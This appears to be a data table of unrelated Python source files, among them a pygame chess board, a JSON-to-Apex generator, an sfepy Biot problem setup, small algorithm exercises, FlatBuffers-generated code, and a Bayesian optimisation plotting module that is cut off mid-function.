content
stringlengths 5
1.05M
|
|---|
import pygame
import colors
from teams import *
import os
import exceptions
import logging
pygame.init()
SCREEN_WIDTH = pygame.display.Info().current_w
SCREEN_HEIGHT = pygame.display.Info().current_h - 50
HEIGHT_OF_SCOREBOARD = 200
SPACE_FROM_SCOREBOARD = 50
BOARD_SIDE = SCREEN_HEIGHT - HEIGHT_OF_SCOREBOARD - SPACE_FROM_SCOREBOARD * 2
MIDDLE_HORIZONTAL = SCREEN_WIDTH / 2
RECT_WIDTH = 200
RECT_HEIGHT = 100
NUMBER_OF_SMALL_RECTS = 4
SMALL_RECT_WIDTH = SCREEN_WIDTH/(NUMBER_OF_SMALL_RECTS*4)
SMALL_RECT_HEIGHT = SCREEN_HEIGHT/(NUMBER_OF_SMALL_RECTS*2)
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
squares = []
PICTURES_PATH = 'pictures'
NUMBER_OF_SQUARES = 8
SCORE_BOARD = pygame.Surface((SCREEN_WIDTH, HEIGHT_OF_SCOREBOARD))
REGULAR_FONT = pygame.font.SysFont('comicsansms', 30)
LARGE_FONT = pygame.font.Font('freesansbold.ttf', 80)
SPACE_BETWEEN_BOARD_AND_EATEN_PIECES = 100
GAME_LENGTH_OPTION = (1, 3, 5, 10)
LIGHT_SQUARE_COLOR = colors.LIGHT_BLUE
DARK_SQUARE_COLOR = colors.DARK_BLUE
class Square:
SIDE = BOARD_SIDE/NUMBER_OF_SQUARES
def __init__(self, x, y, color, tur, line):
self.rect = pygame.Rect(x, y, self.SIDE, self.SIDE)
self.color = color
self.original_color = color
self.tur_cord = tur
self.line_cord = line
self.id = str(line) + str(tur)
self.x_mid = x + Square.SIDE/2
self.y_mid = y + Square.SIDE/2
self.current_piece = None
def draw(self):
pygame.draw.rect(screen, self.color, self.rect)
if self.current_piece is not None:
self.current_piece.draw()
def coloring_square_by_original_color(self):
if self.color == self.original_color:
if self.original_color == DARK_SQUARE_COLOR:
self.color = colors.DARK_RED
else:
self.color = colors.LIGHT_RED
else:
self.color = self.original_color
def __str__(self):
return f'(line: {self.line_cord}, tur: {self.tur_cord})'
def add_squares_to_board():
# at the begging of the game, draw and init the squares.
bg_image = pygame.image.load(os.path.join(PICTURES_PATH, 'main_background.jpg'))
screen.blit(bg_image, (0, HEIGHT_OF_SCOREBOARD))
x = SPACE_FROM_SCOREBOARD
y = HEIGHT_OF_SCOREBOARD + SPACE_FROM_SCOREBOARD
for line in range(NUMBER_OF_SQUARES):
tmp = line % 2
line_of_squars = []
for tur in range(NUMBER_OF_SQUARES):
if tur % 2 == tmp:
color = LIGHT_SQUARE_COLOR
else:
color = DARK_SQUARE_COLOR
current_square = Square(x, y, color, tur, line)
line_of_squars.append(current_square)
x += Square.SIDE
squares.append(line_of_squars)
x = SPACE_FROM_SCOREBOARD
y += Square.SIDE
pygame.display.flip()
def is_move_to_square_valid(tur, line, team):
if 0 <= line < NUMBER_OF_SQUARES and 0 <= tur < NUMBER_OF_SQUARES:
# Square is on the board
check_square_piece = squares[line][tur].current_piece
if check_square_piece is not None:
# Check if other piece is on the same team.
return team is not check_square_piece.team
# Next move is inside board and empty square.
return True
return False
def draw_bg(team_got_turn: Team, team_doesnt_got_turn: Team):
draw_scoreboard(team_got_turn, team_doesnt_got_turn)
draw_board()
def draw_scoreboard(team_got_turn: Team, team_doesnt_got_turn: Team):
white_team, black_team = get_teams_colors(team_got_turn, team_doesnt_got_turn)
screen.blit(SCORE_BOARD, (0, 0))
# I switched to just clear color and not an image as the background of the scoreboard.
# draw bg image of score board. this way the last "scoreboard" is erased.
SCORE_BOARD.fill(colors.DARK_BLUE)
# bg_image = pygame.image.load(os.path.join(PICTURES_PATH, 'boardscore_bg.png'))
# SCORE_BOARD.blit(bg_image, (0, 0))
draw_who_turn_is(team_got_turn)
draw_timers(white_team, black_team)
draw_score(team_got_turn, team_doesnt_got_turn)
def draw_board():
for line in squares:
for square in line:
square.draw()
def draw_who_turn_is(team_got_turn):
if team_got_turn.is_white_team:
text = LARGE_FONT.render('White Player Turn', False, colors.WHITE)
else:
text = LARGE_FONT.render('Black Player Turn', False, colors.BLACK)
SCORE_BOARD.blit(text, (MIDDLE_HORIZONTAL - text.get_width()/2, 0))
def draw_timer(team):
timer = team.timer
color = colors.WHITE if team.is_white_team else colors.BLACK
minutes = timer.get_minutes_left()
seconds = timer.get_seconds_left_to_last_minute()
seconds = '00' if seconds == 60 else str(seconds).zfill(2)
minutes = str(minutes).zfill(2)
text = REGULAR_FONT.render(f"{minutes}:{seconds}", False, color)
place = (10, 0) if team.is_white_team else (SCORE_BOARD.get_width() - text.get_width(), 0)
SCORE_BOARD.blit(text, place)
def draw_timers(white_team, black_team):
draw_timer(white_team)
draw_timer(black_team)
def draw_score(team_got_turn, team_doesnt_got_turn):
white_team = team_got_turn if team_got_turn.is_white_team else team_doesnt_got_turn
black_team = team_got_turn if not team_got_turn.is_white_team else team_doesnt_got_turn
white_team.update_score()
black_team.update_score()
length = SCREEN_WIDTH - 20
text = REGULAR_FONT.render("White team score:", False, colors.WHITE)
SCORE_BOARD.blit(text, (0, SCORE_BOARD.get_height() - 15 - text.get_height()))
text = REGULAR_FONT.render("Black team score:", False, colors.WHITE)
SCORE_BOARD.blit(text, (SCREEN_WIDTH - text.get_width() - 10, SCORE_BOARD.get_height() - 15 - text.get_height()))
pygame.draw.rect(SCORE_BOARD, colors.BLACK, (10, SCORE_BOARD.get_height() - 15, length, 10))
white_rect_length = length / 2 + get_score_difference(white_team, black_team) / 10
pygame.draw.rect(SCORE_BOARD, colors.WHITE, (10, SCORE_BOARD.get_height() - 15, white_rect_length, 10))
def color_all_square_to_original_color():
for line in squares:
for square in line:
if square.color != square.original_color:
square.coloring_square_by_original_color()
def draw_eaten_pieces(white_team: Team, black_team: Team):
width, height = int(SCREEN_WIDTH - BOARD_SIDE - (SPACE_BETWEEN_BOARD_AND_EATEN_PIECES * 2)),\
int(white_team.pieces[0].image.get_height() + 5)
rect = pygame.Rect(BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES,
SCORE_BOARD.get_height() + (SPACE_FROM_SCOREBOARD*2), width, height)
pygame.draw.rect(screen, colors.DARK_BLUE, rect)
x = BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES
size = int(min(width / 16, white_team.pieces[0].image.get_height()))
for eaten_piece in white_team.eaten_pieces:
image = pygame.transform.scale(eaten_piece.image, (size, size))
screen.blit(image, (x, rect.top))
x += size
rect = pygame.Rect(BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES,
SCREEN_HEIGHT - (SPACE_FROM_SCOREBOARD*2) - height, width, height)
pygame.draw.rect(screen, colors.WHITE, rect)
x = BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES
for eaten_piece in black_team.eaten_pieces:
image = pygame.transform.scale(eaten_piece.image, (size, size))
screen.blit(image, (x, rect.top))
x += size
def draw_winner(team_won):
text = f"Team won is {team_won}"
logging.info(text)
text_surface = LARGE_FONT.render(text, False, colors.LIGHT_BLUE)
screen.blit(text_surface, (MIDDLE_HORIZONTAL - text_surface.get_width()/2, SCREEN_HEIGHT / 2 - text_surface.get_height()/2))
pygame.display.flip()
def draw_tie():
text = f"Tie"
text_surface = LARGE_FONT.render(text, False, colors.DARK_GREEN)
screen.blit(text_surface, (SCREEN_WIDTH / 2 - 50, SCREEN_HEIGHT / 2 - 30))
pygame.display.flip()
|
from json import loads
from utilities import *
from re import sub
from modules.constants import GEN_STARTERS, QUOTED_HELP_MSG, JSON_ERROR
# This method starts the code running
def getApexCode(inputJson):
apex = GEN_STARTERS
print( type(inputJson) )
try:
y = loads(inputJson)
except ValueError as err:
return JSON_ERROR
if type(y) is list:
apex += startingArray
if len(y) > 0 and (type(y[0]) is dict):
for i in y:
apex += startObject
apex += funToCheck(i)
apex += endObject
else:
listType = getListType(y)
values = str(y).replace("[", "").replace("]", "")
apex += writeObject("new List<" + listType + ">{" + values + "}")
apex += endingArray
elif type(y) is dict:
apex += startObject
apex += funToCheck(y)
apex += endObject
elif type(y) is str:
apex += writeString(y)
elif type(y) is int:
apex += writeNumber(y)
elif type(y) is bool:
apex += writeBoolean(y)
apex += ' return gen;\n'
return apex + '}'
# This method recursively generates the code
def funToCheck(j):
apex = ""
for x in j.keys():
if type(j.get(x)) is dict:
apex += writeFieldName(x)
apex += startObject
apex += funToCheck(j.get(x))
apex += endObject
elif type(j.get(x)) is list:
if len(j.get(x)) == 0:
apex += writeFieldName(x)
apex += startingArray
apex += endingArray
elif len(j.get(x)) > 0 and type(j.get(x)[0]) is dict:
apex += writeFieldName(x)
apex += startingArray
for i in j.get(x):
apex += startObject
apex += funToCheck(i)
apex += endObject
apex += endingArray
else:
listType = getListType(j.get(x))
if listType is not None:
values = str(j.get(x)).replace("[", "").replace("]", "")
apex += writeObjectField(x, "new List<" + listType + ">{" + values + "}")
elif type(j.get(x)) is str:
apex += writeStringField(x, str(j.get(x)))
elif type(j.get(x)) is int:
apex += writeNumberField(x, str(j.get(x)))
elif type(j.get(x)) is bool:
apex += writeBooleanField(x, str(j.get(x)))
elif j.get(x) is None:
apex += writeNullField(x)
return apex
def parseQuotedJson( jsonBody ):
jsonBody = jsonBody.strip()
if(jsonBody.startswith("'")):
jsonBody = jsonBody[1:]
if( jsonBody.endswith("'") ):
jsonBody = jsonBody[:-1]
jsonBody = sub("['+ ']", "", jsonBody)
return jsonBody
|
# ! This file exists entirely to load pytest plugins. Do not add anything else here.
pytest_plugins = [
"api_test_utils.fixtures",
]
|
r"""
Biot problem - deformable porous medium with the no-penetration boundary
condition on a boundary region.
Find :math:`\ul{u}`, :math:`p` such that:
.. math::
\int_{\Omega} D_{ijkl}\ e_{ij}(\ul{v}) e_{kl}(\ul{u})
- \int_{\Omega} p\ \alpha_{ij} e_{ij}(\ul{v})
= 0
\;, \quad \forall \ul{v} \;,
\int_{\Omega} q\ \alpha_{ij} e_{ij}(\ul{u})
+ \int_{\Omega} K_{ij} \nabla_i q \nabla_j p
= 0
\;, \quad \forall q \;,
\ul{u} \cdot \ul{n} = 0 \mbox{ on } \Gamma_{walls} \;,
where
.. math::
D_{ijkl} = \mu (\delta_{ik} \delta_{jl}+\delta_{il} \delta_{jk}) +
\lambda \ \delta_{ij} \delta_{kl}
\;.
"""
import os
import numpy as nm
from sfepy.linalg import get_coors_in_tube
from sfepy.mechanics.matcoefs import stiffness_from_lame
def define():
from sfepy import data_dir
filename = data_dir + '/meshes/3d/cylinder.mesh'
output_dir = 'output'
return define_input(filename, output_dir)
def cinc_simple(coors, mode):
axis = nm.array([1, 0, 0], nm.float64)
if mode == 0: # In
centre = nm.array([0.0, 0.0, 0.0], nm.float64)
radius = 0.019
length = 0.00002
elif mode == 1: # Out
centre = nm.array([0.1, 0.0, 0.0], nm.float64)
radius = 0.019
length = 0.00002
elif mode == 2: # Rigid
centre = nm.array([0.05, 0.0, 0.0], nm.float64)
radius = 0.015
length = 0.03
else:
raise ValueError('unknown mode %s!' % mode)
return get_coors_in_tube(coors,
centre, axis, -1, radius, length)
def define_regions(filename):
if filename.find('simple.mesh'):
dim = 3
regions = {
'Omega' : 'all',
'Walls' : ('vertices of surface -v (r.Outlet +f r.Inlet)', 'facet'),
'Inlet' : ('vertices by cinc_simple0', 'facet'),
'Outlet' : ('vertices by cinc_simple1', 'facet'),
'Rigid' : 'vertices by cinc_simple2',
}
else:
raise ValueError('unknown mesh %s!' % filename)
return regions, dim
def get_pars(ts, coor, mode, output_dir='.', **kwargs):
if mode == 'qp':
n_nod, dim = coor.shape
sym = (dim + 1) * dim / 2
out = {}
out['D'] = nm.tile(stiffness_from_lame(dim, lam=1.7, mu=0.3),
(coor.shape[0], 1, 1))
aa = nm.zeros((sym, 1), dtype=nm.float64)
aa[:dim] = 0.132
aa[dim:sym] = 0.092
out['alpha'] = nm.tile(aa, (coor.shape[0], 1, 1))
perm = nm.eye(dim, dtype=nm.float64)
out['K'] = nm.tile(perm, (coor.shape[0], 1, 1))
return out
def post_process(out, pb, state, extend=False):
from sfepy.base.base import Struct
dvel = pb.evaluate('ev_diffusion_velocity.i.Omega( m.K, p )',
mode='el_avg')
out['dvel'] = Struct(name='output_data',
mode='cell', data=dvel, dofs=None)
stress = pb.evaluate('ev_cauchy_stress.i.Omega( m.D, u )',
mode='el_avg')
out['cauchy_stress'] = Struct(name='output_data',
mode='cell', data=stress, dofs=None)
return out
def define_input(filename, output_dir):
filename_mesh = filename
options = {
'output_dir' : output_dir,
'output_format' : 'vtk',
'post_process_hook' : 'post_process',
'ls' : 'ls',
'nls' : 'newton',
}
functions = {
'cinc_simple0' : (lambda coors, domain:
cinc_simple(coors, 0),),
'cinc_simple1' : (lambda coors, domain:
cinc_simple(coors, 1),),
'cinc_simple2' : (lambda coors, domain:
cinc_simple(coors, 2),),
'get_pars' : (lambda ts, coors, mode=None, **kwargs:
get_pars(ts, coors, mode,
output_dir=output_dir, **kwargs),),
}
regions, dim = define_regions(filename_mesh)
field_1 = {
'name' : 'displacement',
'dtype' : nm.float64,
'shape' : dim,
'region' : 'Omega',
'approx_order' : 1,
}
field_2 = {
'name' : 'pressure',
'dtype' : nm.float64,
'shape' : 1,
'region' : 'Omega',
'approx_order' : 1,
}
variables = {
'u' : ('unknown field', 'displacement', 0),
'v' : ('test field', 'displacement', 'u'),
'p' : ('unknown field', 'pressure', 1),
'q' : ('test field', 'pressure', 'p'),
}
ebcs = {
'inlet' : ('Inlet', {'p.0' : 1.0, 'u.all' : 0.0}),
'outlet' : ('Outlet', {'p.0' : -1.0}),
}
lcbcs = {
'rigid' : ('Outlet', {'u.all' : 'rigid'}),
'no_penetration' : ('Walls', {'u.all' : 'no_penetration'}),
}
material_1 = {
'name' : 'm',
'function' : 'get_pars',
}
integral_1 = {
'name' : 'i',
'order' : 2,
}
equations = {
'eq_1' :
"""dw_lin_elastic.i.Omega( m.D, v, u )
- dw_biot.i.Omega( m.alpha, v, p )
= 0""",
'eq_2' :
"""dw_biot.i.Omega( m.alpha, u, q )
+ dw_diffusion.i.Omega( m.K, q, p )
= 0""",
}
solver_0 = {
'name' : 'ls',
'kind' : 'ls.scipy_direct', # Direct solver.
}
solver_1 = {
'name' : 'newton',
'kind' : 'nls.newton',
}
return locals()
|
'''Write a program to accept a number and check and display whether it is a Niven Number or not.
Niven Number is that a number which is divisible by its sum of digits.
Input Format
a number
Constraints
n>0
Output Format
Yes or No
Sample Input 0
126
Sample Output 0
Yes
Sample Input 1
10
Sample Output 1
Yes'''
#solution
def niven(num):
summ = 0
for i in num:
summ += int(i)
return "Yes" if int(num) % summ == 0 else "No"
print(niven(input()))
|
from database.base import Transfer
class TweetphotoTransfer(Transfer):
table_name = 'tweet_photo'
def process_origin(self):
datalist = []
origins = self.collection.find({'status': {'$ne': 'done'}})
# origins = self.collection.find()
if origins.count() > 0:
for one in origins:
print('id: %s' % one['_id'])
datalist.append(one)
return datalist
def start():
print('------------------------------ TweetPhoto 数据发送开始 ---------------------------------')
TweetphotoTransfer().start()
|
"""
输入两个单调递增的链表,输出两个链表合成后的链表,当然我们需要合成后的链表满足单调不减规则
"""
class Node:
def __init__(self, value):
self.value = value
self.next = None
class Solution:
def merge_linklists(self, head1, head2):
# 创建游标
cur1 = head1
cur2 = head2
# 确定新列表表头
if cur1.value >= cur2.value:
newhead = cur2
cur2 = cur2.next
else:
newhead = cur1
cur1 = cur1.next
# 创建新列表游标
newcur = newhead
# 进行比较,新链表的下一个节点是两个游标中值比较小的那一个
while cur1 and cur2:
if cur1.value <= cur2.value:
newcur.next = cur1
newcur = newcur.next
cur1 = cur1.next
else:
newcur.next = cur2
newcur = newcur.next
cur2 = cur2.next
# 循环结束意味着一定有一个列表为空了
if cur1:
newcur.next = cur1
else:
newcur.next = cur2
return newhead
if __name__ == '__main__':
node1 = Node(100)
node1.next = Node(200)
node1.next.next = Node(300)
node1.next.next.next = Node(400)
node2 = Node(1)
node2.next = Node(200)
node2.next.next = Node(600)
node2.next.next.next = Node(800)
s = Solution()
newcur = s.merge_linklists(node1, node2)
while newcur:
print(newcur.value)
newcur = newcur.next
|
#!/usr/bin/env python3
# Generate the appveyor.yml file used to specify which configurations Appveyor
# tests.
import yaml
MSVC_VERSIONS = [
{"num": 15, "year": 2017, "stds": ["c++17","c++latest"], "boost": "1_69_0"},
]
def get_msvc_nodes_for_version(version):
win32_base = {
"GENERATOR_NAME": "Visual Studio {0} {1}".format(version["num"], version["year"]),
"BOOST_VERSION": version["boost"]
}
win64_base = {
"GENERATOR_NAME": "Visual Studio {0} {1} Win64".format(version["num"], version["year"]),
"BOOST_VERSION": version["boost"]
}
# Appveyor currently runs their VS2017 builds on a different VM.
if version["num"] >= 15:
win32_base["APPVEYOR_BUILD_WORKER_IMAGE"] = "Visual Studio 2017"
win64_base["APPVEYOR_BUILD_WORKER_IMAGE"] = "Visual Studio 2017"
ret = []
if len(version["stds"]) > 0:
for std in version["stds"]:
win32 = win32_base.copy()
win64 = win64_base.copy()
win32["STD"] = std
win64["STD"] = std
ret += [win32, win64]
else:
ret = [win32_base, win64_base]
return ret
if __name__ == "__main__":
msvc_nodes = [get_msvc_nodes_for_version(version) for version in MSVC_VERSIONS]
# Flatten
msvc_nodes = [item for innerlist in msvc_nodes for item in innerlist]
yml = {
"platform": "x64",
"configuration": "Release",
"install": "git submodule update --init --recursive",
"environment": {
"matrix": msvc_nodes
},
"build_script": [
"mkdir build",
"cd build",
"cmake -G \"%GENERATOR_NAME%\" -DCMAKE_BUILD_TYPE=Release -DBOOST_ROOT=C:/Libraries/boost_%BOOST_VERSION% -DMANUALLY_SET_STANDARD_FLAGS=ON ..",
"cmake --build . --config \"Release\"",
"ctest --output-on-failure"
]
}
with open("appveyor.yml", "w") as yaml_file:
yaml_file.write("# This file is auto-generated by tools/generate-appveyor-yaml.py.\n\n")
yaml.dump(yml, yaml_file, default_flow_style=False)
|
# coding=utf-8
import mock
from nose.tools import assert_equal, assert_true
from dmapiclient import HTTPError
from ...helpers import BaseApplicationTest
import pytest
@pytest.mark.skipif(True, reason='gcloud out of scope')
@mock.patch('app.main.views.g_cloud.search_api_client')
class TestErrors(BaseApplicationTest):
def test_404(self, search_api_mock):
res = self.client.get('/g-cloud/service/1234')
assert_equal(404, res.status_code)
assert_true(
"Check you've entered the correct web "
"address or start again on the Digital Marketplace homepage."
in res.get_data(as_text=True))
assert_true(
"If you can't find what you're looking for, email "
"<a href=\"mailto:enquiries@digitalmarketplace.service.gov.uk?"
"subject=Digital%20Marketplace%20feedback\" title=\"Please "
"send feedback to enquiries@digitalmarketplace.service.gov.uk\">"
"enquiries@digitalmarketplace.service.gov.uk</a>"
in res.get_data(as_text=True))
def test_410(self, search_api_mock):
res = self.client.get('/digital-services/framework')
assert_equal(410, res.status_code)
assert_true(
"Check you've entered the correct web "
"address or start again on the Digital Marketplace homepage."
in res.get_data(as_text=True))
assert_true(
"If you can't find what you're looking for, email "
"<a href=\"mailto:enquiries@digitalmarketplace.service.gov.uk?"
"subject=Digital%20Marketplace%20feedback\" title=\"Please "
"send feedback to enquiries@digitalmarketplace.service.gov.uk\">"
"enquiries@digitalmarketplace.service.gov.uk</a>"
in res.get_data(as_text=True))
def test_500(self, search_api_mock):
self.app.config['DEBUG'] = False
api_response = mock.Mock()
api_response.status_code = 503
search_api_mock.search_services.side_effect = HTTPError(api_response)
res = self.client.get('/g-cloud/search?q=email')
assert_equal(503, res.status_code)
assert_true(
"Sorry, we're experiencing technical difficulties"
in res.get_data(as_text=True))
assert_true(
"Try again later."
in res.get_data(as_text=True))
|
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: Example
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class NestedStruct(object):
__slots__ = ['_tab']
# NestedStruct
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# NestedStruct
def A(self): return [self._tab.Get(flatbuffers.number_types.Int32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(0 + i * 4)) for i in range(2)]
# NestedStruct
def ALength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(0))
if o != 0:
return self._tab.VectorLen(o)
return 0
# NestedStruct
def AIsNone(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(0))
return o == 0
# NestedStruct
def B(self): return self._tab.Get(flatbuffers.number_types.Int8Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(8))
# NestedStruct
def C(self): return [self._tab.Get(flatbuffers.number_types.Int8Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(9 + i * 1)) for i in range(2)]
# NestedStruct
def CLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(9))
if o != 0:
return self._tab.VectorLen(o)
return 0
# NestedStruct
def CIsNone(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(9))
return o == 0
# NestedStruct
def D(self): return [self._tab.Get(flatbuffers.number_types.Int64Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(16 + i * 8)) for i in range(2)]
# NestedStruct
def DLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
if o != 0:
return self._tab.VectorLen(o)
return 0
# NestedStruct
def DIsNone(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
return o == 0
def CreateNestedStruct(builder, a, b, c, d):
builder.Prep(8, 32)
for _idx0 in range(2 , 0, -1):
builder.PrependInt64(d[_idx0-1])
builder.Pad(5)
for _idx0 in range(2 , 0, -1):
builder.PrependInt8(c[_idx0-1])
builder.PrependInt8(b)
for _idx0 in range(2 , 0, -1):
builder.PrependInt32(a[_idx0-1])
return builder.Offset()
try:
from typing import List
except:
pass
class NestedStructT(object):
# NestedStructT
def __init__(self):
self.a = None # type: List[int]
self.b = 0 # type: int
self.c = None # type: List[int]
self.d = None # type: List[int]
@classmethod
def InitFromBuf(cls, buf, pos):
nestedStruct = NestedStruct()
nestedStruct.Init(buf, pos)
return cls.InitFromObj(nestedStruct)
@classmethod
def InitFromObj(cls, nestedStruct):
x = NestedStructT()
x._UnPack(nestedStruct)
return x
# NestedStructT
def _UnPack(self, nestedStruct):
if nestedStruct is None:
return
if not nestedStruct.AIsNone():
if np is None:
self.a = []
for i in range(nestedStruct.ALength()):
self.a.append(nestedStruct.A(i))
else:
self.a = nestedStruct.AAsNumpy()
self.b = nestedStruct.B()
if not nestedStruct.CIsNone():
if np is None:
self.c = []
for i in range(nestedStruct.CLength()):
self.c.append(nestedStruct.C(i))
else:
self.c = nestedStruct.CAsNumpy()
if not nestedStruct.DIsNone():
if np is None:
self.d = []
for i in range(nestedStruct.DLength()):
self.d.append(nestedStruct.D(i))
else:
self.d = nestedStruct.DAsNumpy()
# NestedStructT
def Pack(self, builder):
return CreateNestedStruct(builder, self.a, self.b, self.c, self.d)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 27 23:22:32 2016
@author: Vu
"""
from __future__ import division
import numpy as np
#import mayavi.mlab as mlab
#from scipy.stats import norm
#import matplotlib as plt
from mpl_toolkits.mplot3d import Axes3D
from prada_bayes_opt import PradaBayOptFn
#from prada_bayes_opt import PradaBayOptBatch
import matplotlib.patches as patches
import matplotlib.pyplot as plt
from matplotlib import gridspec
import random
from acquisition_functions import AcquisitionFunction, unique_rows
import os
from pylab import *
cdict = {'red': ((0.0, 0.0, 0.0),
(0.5, 1.0, 0.7),
(1.0, 1.0, 1.0)),
'green': ((0.0, 0.0, 0.0),
(0.5, 1.0, 0.0),
(1.0, 1.0, 1.0)),
'blue': ((0.0, 0.0, 0.0),
(0.5, 1.0, 0.0),
(1.0, 0.5, 1.0))}
#my_cmap = matplotlib.colors.LinearSegmentedColormap('my_colormap',cdict,256)
#my_cmap = plt.get_cmap('cubehelix')
my_cmap = plt.get_cmap('Blues')
counter = 0
#class Visualization(object):
#def __init__(self,bo):
#self.plot_gp=0
#self.posterior=0
#self.myBo=bo
def plot_bo(bo):
if bo.dim==1:
plot_bo_1d(bo)
if bo.dim==2:
plot_bo_2d(bo)
def plot_histogram(bo,samples):
if bo.dim==1:
plot_histogram_1d(bo,samples)
if bo.dim==2:
plot_histogram_2d(bo,samples)
def plot_mixturemodel(g,bo,samples):
if bo.dim==1:
plot_mixturemodel_1d(g,bo,samples)
if bo.dim==2:
plot_mixturemodel_2d(g,bo,samples)
def plot_mixturemodel_1d(g,bo,samples):
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
x_plot = np.linspace(np.min(samples), np.max(samples), len(samples))
x_plot = np.reshape(x_plot,(len(samples),-1))
y_plot = g.score_samples(x_plot)[0]
x_plot_ori = np.linspace(np.min(samples_original), np.max(samples_original), len(samples_original))
x_plot_ori=np.reshape(x_plot_ori,(len(samples_original),-1))
fig=plt.figure(figsize=(8, 3))
plt.plot(x_plot_ori, np.exp(y_plot), color='red')
plt.xlim(bo.bounds[0,0],bo.bounds[0,1])
plt.xlabel("X",fontdict={'size':16})
plt.ylabel("f(X)",fontdict={'size':16})
plt.title("IGMM Approximation",fontsize=16)
def plot_mixturemodel_2d(dpgmm,bo,samples):
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
dpgmm_means_original=dpgmm.truncated_means_*bo.max_min_gap+bo.bounds[:,0]
#fig=plt.figure(figsize=(12, 5))
fig=plt.figure()
myGmm=fig.add_subplot(1,1,1)
x1 = np.linspace(bo.scalebounds[0,0],bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0],bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
x_plot=np.c_[x1g.flatten(), x2g.flatten()]
y_plot2 = dpgmm.score_samples(x_plot)[0]
y_plot2=np.exp(y_plot2)
#y_label=dpgmm.predict(x_plot)[0]
x1_ori = np.linspace(bo.bounds[0,0],bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0],bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
CS_acq=myGmm.contourf(x1g_ori,x2g_ori,y_plot2.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
myGmm.scatter(dpgmm_means_original[:,0],dpgmm_means_original[:,1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
myGmm.set_title('IGMM Approximation',fontsize=16)
myGmm.set_xlim(bo.bounds[0,0],bo.bounds[0,1])
myGmm.set_ylim(bo.bounds[1,0],bo.bounds[1,1])
myGmm.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_histogram_2d(bo,samples):
# convert samples from 0-1 to original scale
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
#fig=plt.figure(figsize=(12, 5))
fig=plt.figure()
myhist=fig.add_subplot(1,1,1)
myhist.set_title("Histogram of Samples under Acq Func",fontsize=16)
#xedges = np.linspace(myfunction.bounds['x1'][0], myfunction.bounds['x1'][1], 10)
#yedges = np.linspace(myfunction.bounds['x2'][0], myfunction.bounds['x2'][1], 10)
xedges = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 10)
yedges = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 10)
H, xedges, yedges = np.histogram2d(samples_original[:,0], samples_original[:,1], bins=50)
#data = [go.Histogram2d(x=vu[:,1],y=vu[:,0])]
#plot_url = py.plot(data, filename='2d-histogram')
# H needs to be rotated and flipped
H = np.rot90(H)
H = np.flipud(H)
# Mask zeros
Hmasked = np.ma.masked_where(H==0,H) # Mask pixels with a value of zero
# Plot 2D histogram using pcolor
myhist.pcolormesh(xedges,yedges,Hmasked)
myhist.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
myhist.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
def plot_histogram_1d(bo,samples):
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
fig=plt.figure(figsize=(8, 3))
fig.suptitle("Histogram",fontsize=16)
myplot=fig.add_subplot(111)
myplot.hist(samples_original,50)
myplot.set_xlim(bo.bounds[0,0],bo.bounds[0,1])
myplot.set_xlabel("Value",fontsize=16)
myplot.set_ylabel("Frequency",fontsize=16)
def plot_bo_1d(bo):
func=bo.f
#x_original = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 1000)
x_original=x*bo.max_min_gap+bo.bounds[:,0]
y_original = func(x_original)
#y = func(x)
#y_original=mu*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
fig=plt.figure(figsize=(8, 5))
fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
axis = plt.subplot(gs[0])
acq = plt.subplot(gs[1])
mu, sigma = bo.posterior(x)
#mu_original=mu*(np.max(y_original)-np.min(y_original))+np.mean(y_original)
mu_original=mu*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
sigma_original=sigma*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.plot(x_original, y_original, linewidth=3, label='Real Function')
axis.plot(bo.X_original.flatten(), bo.Y_original, 'D', markersize=8, label=u'Observations', color='r')
axis.plot(x_original, mu_original, '--', color='k', label='GP mean')
#samples*bo.max_min_gap+bo.bounds[:,0]
temp_xaxis=np.concatenate([x_original, x_original[::-1]])
#temp_xaxis=temp*bo.max_min_gap+bo.bounds[:,0]
